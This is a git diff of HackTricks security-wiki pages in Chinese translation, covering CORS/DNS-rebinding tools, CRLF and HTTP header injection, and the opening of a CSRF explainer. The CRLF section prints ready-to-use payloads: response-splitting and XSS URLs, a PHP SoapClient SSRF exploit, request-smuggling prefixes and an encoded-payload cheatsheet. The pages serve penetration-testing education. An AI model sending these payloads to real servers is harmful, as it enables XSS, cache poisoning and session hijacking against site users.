您可以在演讲[Gerald Doussot - State of DNS Rebinding Attacks & Singularity of Origin - DEF CON 27 Conference](https://www.youtube.com/watch?v=y9-0lICNjOQ)中找到有关先前绕过技术的更多信息以及如何使用以下工具
### 针对DNS Rebinding的真实保护
[**`Singularity of Origin`**](https://github.com/nccgroup/singularity)是一个执行[DNS重绑定](https://en.wikipedia.org/wiki/DNS\_rebinding)攻击的工具。它包括将攻击服务器DNS名称的IP地址重新绑定到目标机器的IP地址并提供攻击有效载荷以利用目标机器上脆弱软件所需的组件。
### Real Protection against DNS Rebinding
* 在内部服务中使用TLS
* 请求身份验证以访问数据
* 验证主机
* [https://wicg.github.io/private-network-access/](https://wicg.github.io/private-network-access/): 建议当公共服务器想要访问内部服务器时始终发送预检请求
* 验证Host
* [https://wicg.github.io/private-network-access/](https://wicg.github.io/private-network-access/):提议在公共服务器想要访问内部服务器时始终发送预检请求
## **工具**
## **Tools**
**模糊CORS策略中可能的配置错误**
**Fuzz可能的CORS政策配置错误**
* [https://portswigger.net/bappstore/420a28400bad4c9d85052f8d66d3bbd8](https://portswigger.net/bappstore/420a28400bad4c9d85052f8d66d3bbd8)
* [https://github.com/chenjj/CORScanner](https://github.com/chenjj/CORScanner)
@ -369,7 +371,7 @@ DNS 重绑定可用于绕过受害者执行的显式 IP 检查,或者用于用
* [https://github.com/Shivangx01b/CorsMe](https://github.com/Shivangx01b/CorsMe)
* [https://github.com/omranisecurity/CorsOne](https://github.com/omranisecurity/CorsOne)
## 参考资料
## References
* [https://portswigger.net/web-security/cors](https://portswigger.net/web-security/cors)
* [https://portswigger.net/web-security/cors/access-control-allow-origin](https://portswigger.net/web-security/cors/access-control-allow-origin)
@ -385,16 +387,17 @@ DNS 重绑定可用于绕过受害者执行的显式 IP 检查,或者用于用
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
学习和实践AWS黑客攻击<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客攻击<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord小组**](https://discord.gg/hRep4RUj7f)或[**电报小组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,104 +1,107 @@
# CRLF (%0D%0A) 注入
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**漏洞赏金提示****注册** Intigriti这是一家由黑客创建的高级**漏洞赏金平台**!立即加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
### CRLF
回车CR和换行符LF合称为 CRLF是 HTTP 协议中用于表示行尾或新行开头的特殊字符序列。Web 服务器和浏览器使用 CRLF 来区分 HTTP 头和响应体。这些字符在各种 Web 服务器类型(如 Apache 和 Microsoft IIS的 HTTP/1.1 通信中被广泛使用
回车 (CR) 和换行 (LF),统称为 CRLF是在 HTTP 协议中用于表示行结束或新行开始的特殊字符序列。Web 服务器和浏览器使用 CRLF 来区分 HTTP 头和响应体。这些字符在各种 Web 服务器类型(如 Apache 和 Microsoft IIS中普遍用于 HTTP/1.1 通信
### CRLF 注入漏洞
CRLF 注入涉及将 CR 和 LF 字符插入用户提供的输入中。此操作会误导服务器、应用程序或用户,使其将插入的序列解释为一个响应的结束和另一个响应的开始。虽然这些字符本身并不具有危害性,但它们的误用可能导致 HTTP 响应拆分和其他恶意活动。
CRLF 注入涉及将 CR 和 LF 字符插入用户提供的输入中。这一行为误导服务器、应用程序或用户将注入的序列解释为一个响应的结束和另一个响应的开始。虽然这些字符本身并不具害,但其误用可能导致 HTTP 响应分割和其他恶意活动。
### 示例:日志文件中的 CRLF 注入
[此处的示例](https://www.invicti.com/blog/web-security/crlf-http-header/)给出了一个在管理面板中的日志文件示例,其格式为:`IP - 时间 - 访问路径`。典型条目可能如下所示:
[示例来自这里](https://www.invicti.com/blog/web-security/crlf-http-header/)
考虑一个管理员面板中的日志文件,其格式为:`IP - 时间 - 访问路径`。一个典型的条目可能看起来像:
```
123.123.123.123 - 08:15 - /index.php?page=home
```
攻击者可以利用CRLF注入来操纵这个日志。通过在HTTP请求中注入CRLF字符攻击者可以改输出流并伪造日志条目。例如,一个注入的序列可能会将日志条目转换为:
攻击者可以利用CRLF注入来操纵日志。通过在HTTP请求中注入CRLF字符攻击者可以改输出流并伪造日志条目。例如,注入的序列可能会将日志条目转换为:
```
/index.php?page=home&%0d%0a127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
```
这里,`%0d` 和 `%0a` 分别代表 CR 和 LF 的 URL 编码形式。攻击后,日志会误导性地显示:
这里,`%0d` 和 `%0a` 代表 CR 和 LF 的 URL 编码形式。攻击后,日志会误导性地显示:
```
IP - Time - Visited Path
123.123.123.123 - 08:15 - /index.php?page=home&
127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
```
攻击者通过使恶意活动看起来像是本地主机(通常在服务器环境中受信任的实体)执行了这些操作来掩盖他们的恶意活动。服务器将以 `%0d%0a` 开头的查询部分解释为单个参数,而 `restrictedaction` 参数被解析为另一个单独的输入。操纵后的查询有效地模仿了一个合法的管理命令:`/index.php?page=home&restrictedaction=edit`
攻击者通过使其恶意活动看起来像是本地主机(在服务器环境中通常被信任的实体)执行的操作,从而掩盖其恶意活动。服务器将以 `%0d%0a` 开头的查询部分解释为单个参数,而 `restrictedaction` 参数则被解析为另一个独立的输入。被操控的查询有效地模拟了一个合法的管理命令:`/index.php?page=home&restrictedaction=edit`
### HTTP响应拆分
### HTTP 响应拆分
#### 描述
HTTP响应拆分是一种安全漏洞当攻击者利用HTTP响应的结构时会出现这种漏洞。这种结构使用特定字符序列回车CR后跟换行LF总称为CRLF将头部与主体分开。如果攻击者设法在响应头部中插入CRLF序列他们可以有效地操纵随后的响应内容。这种操纵可能导致严重的安全问题尤其是跨站脚本XSS
HTTP 响应拆分是一种安全漏洞,发生在攻击者利用 HTTP 响应的结构时。该结构使用特定字符序列将头部与主体分开即回车CR后跟换行LF统称为 CRLF。如果攻击者设法在响应头中插入 CRLF 序列,他们可以有效地操控后续的响应内容。这种操控可能导致严重的安全问题,特别是跨站脚本XSS
#### 通过HTTP响应拆分实现XSS
#### 通过 HTTP 响应拆分进行 XSS
1. 应用程序设置一个自定义头,如:`X-Custom-Header: UserInput`
2. 应用程序从查询参数中获取 `UserInput` 的值,比如 "user\_input"。在缺乏适当输入验证和编码的情况下,攻击者可以构造一个有效负载其中包含CRLF序列后跟恶意内容
3. 攻击者使用一个特别设计的 'user\_input' 构造URL`?user_input=Value%0d%0a%0d%0a<script>alert('XSS')</script>`
* 在这个URL中`%0d%0a%0d%0a` 是CRLFCRLF的URL编码形式。它欺骗服务器插入CRLF序列使服务器将随后的部分视为响应主体。
4. 服务器在响应头部中反射攻击者的输入,导致意外的响应结构,其中恶意脚本被浏览器解释为响应主体的一部分。
1. 应用程序设置一个自定义头,如:`X-Custom-Header: UserInput`
2. 应用程序从查询参数中获取 `UserInput` 的值,比如 "user\_input"。在缺乏适当输入验证和编码的情况下,攻击者可以构造一个包含 CRLF 序列及恶意内容的有效载荷
3. 攻击者构造一个带有特殊构造的 'user\_input' 的 URL`?user_input=Value%0d%0a%0d%0a<script>alert('XSS')</script>`
* 在这个 URL 中,`%0d%0a%0d%0a` 是 CRLFCRLF 的 URL 编码形式。它欺骗服务器插入一个 CRLF 序列,使服务器将后续部分视为响应主体。
4. 服务器在响应头中反映攻击者的输入,导致意外的响应结构,其中恶意脚本被浏览器解释为响应主体的一部分。
#### 通过HTTP响应拆分导致重定向的示例
#### HTTP 响应拆分导致重定向的示例
来自 [https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62](https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62)
浏览器到:
浏览器到
```
/%0d%0aLocation:%20http://myweb.com
```
服务器响应的头部为
而服务器响应的头部是
```
Location: http://myweb.com
```
**其他示例:(来自** [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)**)**
**其他示例:来自** [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)**)**
```
http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
```
#### 在URL路径中
#### 在 URL 路径中
您可以将**有效负载放在URL路径中**以控制服务器的**响应**(例来自[这里](https://hackerone.com/reports/192667):
您可以将有效负载**放在 URL 路径中**以控制服务器的**响应**例来自[这里](https://hackerone.com/reports/192667)):
```
http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
```
查看更多示例:
Check more examples in:
{% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %}
### HTTP 头注入
### HTTP Header Injection
HTTP 头注入经常通过 CRLF回车和换行注入进行利用允许攻击者插入 HTTP 头。这可能会破坏安全机制,如 XSS跨站脚本过滤器或 SOP同源策略潜在地导致对敏感数据的未经授权访问,如 CSRF 令牌,或通过 cookie 注入操纵用户会话。
HTTP Header Injection常通过 CRLF回车和换行注入进行利用允许攻击者插入 HTTP 头。这可能会破坏安全机制,如 XSS跨站脚本过滤器或 SOP同源策略可能导致对敏感数据(如 CSRF 令牌)的未经授权访问,或通过植入 cookie 操纵用户会话。
#### 通过 HTTP 头注入利用 CORS
#### Exploiting CORS via HTTP Header Injection
攻击者可以注入 HTTP 头以启用 CORS域资源共享),绕过 SOP 强加的限制。这种漏洞允许来自恶意来源的脚本与来自不同来源的资源进行交互,潜在地访问受保护的数据。
攻击者可以注入 HTTP 头以启用 CORS源资源共享),绕过 SOP 施加的限制。这一漏洞允许来自恶意来源的脚本与来自不同来源的资源进行交互,可能访问受保护的数据。
#### 通过 CRLF 利用 SSRF 和 HTTP 请求注入
#### SSRF and HTTP Request Injection via CRLF
CRLF 注入可用于构建并注入全新的 HTTP 请求。一个显著的示例是 PHP 的 `SoapClient` 类中的漏洞,特别是在 `user_agent` 参数内。通过操纵此参数,攻击者可以插入额外的头部和正文内容,甚至完全注入一个新的 HTTP 请求。以下是一个演示此利用的 PHP 示例:
CRLF 注入可用于构造和注入一个全新的 HTTP 请求。一个显著的例子是 PHP 的 `SoapClient` 类中的漏洞,特别是在 `user_agent` 参数内。通过操纵此参数,攻击者可以插入额外的头和主体内容,甚至完全注入一个新的 HTTP 请求。以下是一个演示此利用的 PHP 示例:
```php
$target = 'http://127.0.0.1:9090/test';
$post_string = 'variable=post value';
@ -123,57 +126,57 @@ array(
# Put a netcat listener on port 9090
$client->__soapCall("test", []);
```
### 利用头部注入进行请求串改
### Header Injection to Request Smuggling
有关此技术和潜在问题的更多信息,请[**查看原始来源**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning)。
有关此技术和潜在问题的更多信息 [**请查看原始来源**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning)。
您可以注入必要的头部,以确保**后端在响应初始请求后保持连接打开**
您可以注入必要的头部,以确保 **后端在响应初始请求后保持连接打开**
```
GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0a HTTP/1.1
```
之后,可以指定第二个请求。这种情况通常涉及[HTTP请求走私](http-request-smuggling/),这是一种技术,其中服务器在注入后附加的额外头或主体元素可能导致各种安全漏洞。
在此之后,可以指定第二个请求。此场景通常涉及[HTTP request smuggling](http-request-smuggling/),这是一种技术,其中服务器在注入后附加的额外头或主体元素可能导致各种安全漏洞。
**利用:**
1. **恶意前缀注入**这种方法涉及通过指定恶意前缀来毒化下一个用户的请求或Web缓存。一个示例是:
1. **恶意前缀注入**此方法涉及通过指定恶意前缀来毒害下一个用户的请求或网络缓存。一个例子是:
`GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/redirplz%20HTTP/1.1%0d%0aHost:%20oastify.com%0d%0a%0d%0aContent-Length:%2050%0d%0a%0d%0a HTTP/1.1`
2. **为响应队列毒化制作前缀**:这种方法涉及创建一个前缀,当与尾部垃圾组合时,形成一个完整的第二个请求。这可能触发响应队列毒化。一个示例是:
2. **为响应队列毒害构造前缀**:此方法涉及创建一个前缀,当与尾部垃圾结合时,形成一个完整的第二个请求。这可以触发响应队列毒害。一个例子是:
`GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/%20HTTP/1.1%0d%0aFoo:%20bar HTTP/1.1`
### Memcache注入
### Memcache 注入
Memcache是一个使用明文协议的**键值存储**。更多信息请参阅
Memcache 是一个**使用明文协议的键值存储**。更多信息请参见
{% content-ref url="../network-services-pentesting/11211-memcache/" %}
[11211-memcache](../network-services-pentesting/11211-memcache/)
{% endcontent-ref %}
**阅读完整信息请查看**[**原始报告**](https://www.sonarsource.com/blog/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/)
**有关完整信息,请阅读**[ **原始报告**](https://www.sonarsource.com/blog/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/)
如果一个平台从HTTP请求中获取数据并在未经过消毒的情况下使用它来向**memcache**服务器执行**请求**,攻击者可以利用这种行为来**注入新的memcache命令**。
如果一个平台从**HTTP请求中获取数据并在未清理的情况下使用它**来向**memcache**服务器执行**请求**,攻击者可能会利用这种行为**注入新的 memcache 命令**。
例如,在最初发现的漏洞中,缓存键用于返回用户应连接到的IP和端口攻击者能够**注入memcache命令**,这些命令会**毒化**缓存以将受害者的详细信息(包括用户名和密码)发送到攻击者的服务器:
例如,在最初发现的漏洞中,缓存键用于返回用户应连接的 IP 和端口,攻击者能够**注入 memcache 命令**,这将**毒害**缓存以将受害者的详细信息(包括用户名和密码)发送到攻击者的服务器:
<figure><img src="../.gitbook/assets/image (659).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&#x26;h=178&#x26;auto=format&#x26;fit=crop"><figcaption></figcaption></figure>
此外,研究人员还发现他们可以使memcache响应脱节将攻击者的IP和端口发送给攻击者不知道其电子邮件的用户:
此外,研究人员还发现,他们可以使 memcache 响应不同步,以将攻击者的 IP 和端口发送给攻击者不知道其电子邮件的用户:
<figure><img src="../.gitbook/assets/image (637).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/c6c1f3c4-d244-4bd9-93f7-2c88f139acfa/body-3f9ceeb9-3d6b-4867-a23f-e0e50a46a2e9_14.png?w=1322&#x26;h=506&#x26;auto=format&#x26;fit=crop"><figcaption></figcaption></figure>
### 如何防止Web应用程序中的CRLF / HTTP标头注入
### 如何防止 Web 应用程序中的 CRLF / HTTP 头注入
为了减轻Web应用程序中CRLF回车符和换行符或HTTP标头注入的风险,建议采取以下策略:
为了减轻 Web 应用程序中 CRLF回车和换行或 HTTP 头注入的风险,建议采取以下策略:
1. **避免在响应头中直接使用用户输入**:最安全的方法是避免直接将用户提供的输入合并到响应标头中。
2. **编码特殊字符**:如果无法避免直接使用用户输入,请确保使用专门用于编码特殊字符(如CR回车符和LF换行符的函数。这种做法可以防止CRLF注入的可能性。
3. **更新编程语言**定期将Web应用程序中使用的编程语言更新到最新版本。选择一个在负责设置HTTP标头的函数中禁止CR和LF字符注入的版本。
1. **避免在响应头中直接使用用户输入**:最安全的方法是避免将用户提供的输入直接纳入响应头中。
2. **编码特殊字符**:如果无法避免直接用户输入,请确保使用专门用于编码特殊字符(如 CR 和 LF的函数。这种做法可以防止 CRLF 注入的可能性。
3. **更新编程语言**:定期将用于 Web 应用程序的编程语言更新到最新版本。选择一个本质上不允许在设置 HTTP 头的函数中注入 CR 和 LF 字符的版本。
### 速查表
### CHEATSHEET
[从这里获取速查表](https://twitter.com/NinadMishra5/status/1650080604174667777)
[Cheatsheet from here](https://twitter.com/NinadMishra5/status/1650080604174667777)
```
1. HTTP Response Splitting
• /%0D%0ASet-Cookie:mycookie=myvalue (Check if the response is setting this cookie)
@ -195,7 +198,7 @@ Memcache是一个使用明文协议的**键值存储**。更多信息请参阅
• %E5%98%BC = %3C = \u563c (<)
• Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test
```
## 自动工具
## 自动工具
* [https://github.com/Raghavd3v/CRLFsuite](https://github.com/Raghavd3v/CRLFsuite)
* [https://github.com/dwisiswant0/crlfuzz](https://github.com/dwisiswant0/crlfuzz)
@ -213,20 +216,21 @@ Memcache是一个使用明文协议的**键值存储**。更多信息请参阅
<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**漏洞悬赏提示**: **注册** Intigriti一个由黑客创建的高级**漏洞悬赏平台**!立即加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏!
**漏洞赏金提示**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)系列
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,113 +1,114 @@
# CSRF跨站请求伪造
# CSRF (跨站请求伪造)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客的刺激挑战的内容
参与深入探讨黑客的刺激挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,保持对快速变化的黑客世界的了解
**最新公告**\
随时了解最新的赏金计划发布和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作!
**今天就加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作!
## 解释跨站请求伪造CSRF
## 跨站请求伪造 (CSRF) 解释
**跨站请求伪造CSRF**是一种在Web应用程序中发现的安全漏洞类型。它使攻击者能够利用受害用户的已验证会话代表其执行操作。当登录到受害者平台的用户访问恶意站点时攻击就会执行。然后该站点通过执行JavaScript、提交表单或获取图像等方法触发对受害者帐户的请求。
**跨站请求伪造 (CSRF)** 是一种在 web 应用程序中发现的安全漏洞。它使攻击者能够通过利用用户的认证会话,代表毫无防备的用户执行操作。当一个已登录受害者平台的用户访问恶意网站时,攻击就会被执行。该网站随后通过执行 JavaScript、提交表单或获取图像等方法触发对受害者账户的请求。
### CSRF攻击的先决条件
### CSRF 攻击的前提条件
要利用CSRF漏洞必须满足几个条件
要利用 CSRF 漏洞,必须满足几个条件:
1. **识别有价值的操作**:攻击者需要找到值得利用的操作,例如更改用户的密码、电子邮件或提升权限。
2. **会话管理**:用户的会话应仅通过Cookie或HTTP基本身份验证标头进行管理因为其他标头无法用于此目的进行操作
3. **无法预测的参数**:请求不应包含无法预测的参数,因为这些参数可能会阻止攻击。
1. **识别有价值的操作**:攻击者需要找到一个值得利用的操作,例如更改用户的密码、电子邮件或提升权限。
2. **会话管理**:用户的会话应仅通过 cookies 或 HTTP 基本认证头进行管理,因为其他头无法用于此目的
3. **缺乏不可预测的参数**:请求中不应包含不可预测的参数,因为它们可能会阻止攻击。
### 快速检查
您可以**在Burp中捕获请求**并检查CSRF保护并且可以单击**复制为fetch**以从浏览器测试请求:
您可以在 Burp 中**捕获请求**并检查 CSRF 保护,您可以从浏览器中点击 **复制为 fetch** 并检查请求:
<figure><img src="../.gitbook/assets/image (11) (1).png" alt=""><figcaption></figcaption></figure>
### 防御CSRF攻击
### 防御 CSRF
可以实施多种对策来防御CSRF攻击:
可以实施几种对策来保护免受 CSRF 攻击:
* [**SameSite cookies**](hacking-with-cookies/#samesite):此属性可防止浏览器将Cookie与跨站请求一起发送。[了解更多关于SameSite cookies的信息](hacking-with-cookies/#samesite)。
* [**跨域资源共享**](cors-bypass.md)受害站点的CORS策略可能影响攻击的可行性特别是如果攻击需要读取受害站点的响应。[了解有关CORS绕过的信息](cors-bypass.md)。
* [**SameSite cookies**](hacking-with-cookies/#samesite):此属性防止浏览器在跨站请求中发送 cookies。[了解更多关于 SameSite cookies](hacking-with-cookies/#samesite)。
* [**跨源资源共享**](cors-bypass.md):受害者网站的 CORS 策略可能会影响攻击的可行性,特别是当攻击需要读取受害者网站的响应时。[了解 CORS 绕过](cors-bypass.md)。
* **用户验证**:提示用户输入密码或解决验证码可以确认用户的意图。
* **检查引用者或来源标头**验证这些标头可以帮助确保请求来自受信任的来源。但是精心构造URL可能会绕过实施不良的检查,例如:
* 使用`http://mal.net?orig=http://example.com`URL以受信任的URL结尾
* 使用`http://example.com.mal.net`URL以受信任的URL开头
* **修改参数名称**更改POST或GET请求中参数名称可以帮助防止自动化攻击。
